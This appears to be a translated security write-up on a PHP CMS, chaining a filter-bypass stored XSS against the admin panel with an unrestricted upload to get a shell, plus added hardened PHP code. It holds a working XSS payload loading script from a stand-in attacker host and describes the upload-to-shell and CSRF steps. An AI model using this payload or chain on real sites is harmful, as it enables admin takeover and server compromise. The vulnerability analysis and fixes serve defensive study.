An open-source CMS: filter-bypass XSS, blind hit on the admin backend, then getshell
Tested against the latest version, 1.8. First, look at comment.php:
if ($action == "save") {
    $msgtitle   = $_POST["msgtitle"];
    $msgname    = $_POST["msgname"];
    $msgcontact = $_POST["msgcontact"];
    $msgcontent = $_POST["msgcontent"];
    ......
    $msgcontent = safeCheck($msgcontent);
    $userip = $_SERVER["REMOTE_ADDR"];
    $SQL = "INSERT INTO yiqi_comments (cid, title, name, contact, content, ip, adddate)"
         . " VALUES (NULL, '$msgtitle', '$msgname', '$msgcontact', '$msgcontent', '$userip', null)";
    $result = $yiqi_db->query(CheckSql($SQL));
    if ($result == 1) {
        ShowMsg("message added successfully");
    }
}
We can see that safeCheck() is called, but only on the content field, so the message title can carry XSS directly.
However, the title is limited to 30 characters, which is a real handicap, so we focus on the safeCheck() function itself.
/include/common.func.php
function safeCheck($str) {
    $farr = array(
        "/<(\/?)(script|i?frame|style|html|body|title|link|meta|\?|\%)([^>]*?)>/isU",
            // filter <script> and other tags that may introduce malicious content or maliciously change the display layout;
            // if you do not need to insert flash, you can also add <object> here
        "/(<[^>]*)on[a-zA-Z]+\s*=([^>]*>)/isU",
            // filter javascript on* event handlers
    );
    $tarr = array("", "");
    $str = preg_replace($farr, $tarr, $str);
    return $str;
}
Everyone knows this one.
Oh, God. Isn't this the classic <scr<script>ipt> bypass?
So the payload becomes: <scr<script>ipt src=http://evil.cc/evil.js></scr<script>
And no escaping is applied when the data is read back out.
/admin/comments.php
$cid = $_GET["cid"];
$cid = (isset($cid) && is_numeric($cid)) ? $cid : 0;
$commentdata = new Comments;
$commentinfo = $commentdata->GetComment($cid);
.......
<tr>
    <td class="label">message content</td>
    <td class="input"><?php echo $commentinfo->content; ?></td>
</tr>
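The two weaknesses above (a single-pass tag blacklist that a nested tag survives, and admin output that is echoed raw) share one fix: stop trying to strip "bad" markup and instead escape every user-supplied field at the point it is written into HTML. The following is an added example written for this editorial pass, not code from the CMS; the safeCheck() body is the one quoted from common.func.php, while h(), renderCommentRow() and the sample comment array are assumed names and constructed data.

```php
<?php
// Added example for this write-up, not code from the CMS. It contrasts the
// single-pass blacklist in safeCheck() with output escaping. The safeCheck()
// body is the one quoted in the post; everything else here is assumed.

// The CMS filter as quoted: one preg_replace pass over a tag blacklist.
function safeCheck($str) {
    $farr = array(
        "/<(\/?)(script|i?frame|style|html|body|title|link|meta|\?|\%)([^>]*?)>/isU",
        "/(<[^>]*)on[a-zA-Z]+\s*=([^>]*>)/isU",
    );
    $tarr = array("", "");
    return preg_replace($farr, $tarr, $str);
}

// Defender's replacement: make every user-supplied string inert where it is
// written into HTML, instead of guessing which substrings are dangerous.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Render the admin rows from comments.php with every field escaped, not only
// the content: the original filtered content but never title, name or contact.
function renderCommentRow(array $comment): string {
    $html = '';
    foreach (['title', 'name', 'contact', 'content'] as $field) {
        $html .= '<tr><td class="label">' . h($field) . '</td>'
               . '<td class="input">' . h($comment[$field] ?? '') . '</td></tr>' . "\n";
    }
    return $html;
}

// Constructed sample: the nested-tag input the post describes, once in the
// title (which safeCheck() never saw) and once passed through safeCheck().
$sample = [
    'title'   => '<scr<script>ipt>',
    'name'    => 'visitor',
    'contact' => 'n/a',
    'content' => safeCheck('<scr<script>ipt>'),
];

echo "after safeCheck(): " . $sample['content'] . "\n"; // the blacklist collapses the nested tag into a live <script>
echo renderCommentRow($sample);                           // every field is emitted as &lt;...&gt; text, nothing executes
```

The point is that the second line of output is safe regardless of what the first line shows: escaping does not depend on the filter's regex being complete. If the site genuinely needs formatted comments, use an allow-list HTML sanitizer rather than extending the blacklist.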
The admin backend:
The malicious JS loads:
That covers the blind hit on the backend; next, getshell.
Fortunately, I found a place where files can be uploaded.
Next, look at admin/product-add.php:
if (!empty($_FILES["productthumb"]["name"])) {
    require_once("../include/upload.class.php");
    $filedirectory = YIQIROOT."/uploads/image";
    $filename = date("ymdhis");
    $filetype = $_FILES['productthumb']['type'];
    $upload = new Upload;
    $upload->set_max_size(1800000);
    $upload->set_directory($filedirectory);
    $upload->set_tmp_name($_FILES['productthumb']['tmp_name']);
    $upload->set_file_size($_FILES['productthumb']['size']);
    $upload->set_file_ext($_FILES['productthumb']['name']);
    $upload->set_file_type($filetype);
    $upload->set_file_name($filename);
    $upload->start_copy();
    if ($upload->is_ok()) {
        $productthumb = YIQIPATH."uploads/image/".$filename.'.'.$upload->user_file_ext;
    } else {
        exit($upload->error());
    }
}
There is no type restriction. Note $filename = date("ymdhis"): the request can be intercepted directly, and the stored file name is just the timestamp in ymdhis format.
If that is too much trouble, you can go back to the front end and read the shell's address directly.
Getshell
Of course, since no CSRF check is in place here, the same getshell can also be reached via XSRF.
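The upload handler above has three separable problems: no restriction on file type, a file name that is predictable to the second, and no request-origin check on the form. The following is an added example of a hardened handler, written for this editorial pass and not code from the CMS; the field name productthumb, the /uploads/image directory and the 1800000-byte size cap are taken from the post, while csrfToken(), csrfValid(), validateImageUpload(), storeUpload() and the session key are assumed names.

```php
<?php
// Added example, not the CMS's own upload handler. Hardens the weaknesses the
// post points out in admin/product-add.php: no type restriction, a predictable
// date("ymdhis") file name, and no CSRF check. Field and path names come from
// the post; the function names and the csrf_token field/session key are assumed.

session_start();

// One token per session, compared in constant time.
function csrfToken(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfValid(?string $submitted): bool {
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Allow-list of image types: extension => MIME type the bytes must actually have.
const ALLOWED_IMAGES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// Validate an uploaded image and return the extension to store it under, or null
// to reject it. Decides on the file's bytes, never on the client-supplied
// name or Content-Type (the original trusted $_FILES[...]['type']).
function validateImageUpload(array $file): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    if ($file['size'] > 1800000) { // same cap the original sets via set_max_size()
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGES[$ext])) {
        return null;
    }
    // Sniff the real content type from the bytes ...
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED_IMAGES[$ext]) {
        return null;
    }
    // ... and require that it decodes as an image at all.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }
    return $ext;
}

// Move the validated file under an unguessable name (the original used
// date("ymdhis"), which anyone who knows the upload time can reconstruct).
function storeUpload(array $file, string $directory): ?string {
    $ext = validateImageUpload($file);
    if ($ext === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($directory, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

// Handler: reject the request before touching the file if the token is wrong.
// The form must carry a hidden input named csrf_token whose value is
// htmlspecialchars(csrfToken()).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_FILES['productthumb']['name'])) {
    if (!csrfValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('invalid request token');
    }
    $stored = storeUpload($_FILES['productthumb'], __DIR__ . '/../uploads/image');
    if ($stored === null) {
        exit('upload rejected: only jpg, png or gif images are accepted');
    }
    $productthumb = 'uploads/image/' . $stored;
}
```

As defence in depth, the web server should also be configured so that nothing under /uploads is ever handed to the PHP interpreter; then a file that slips past validation is served as a static blob rather than executed.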
Solution:
Improve the filtering mechanism
Restrict upload types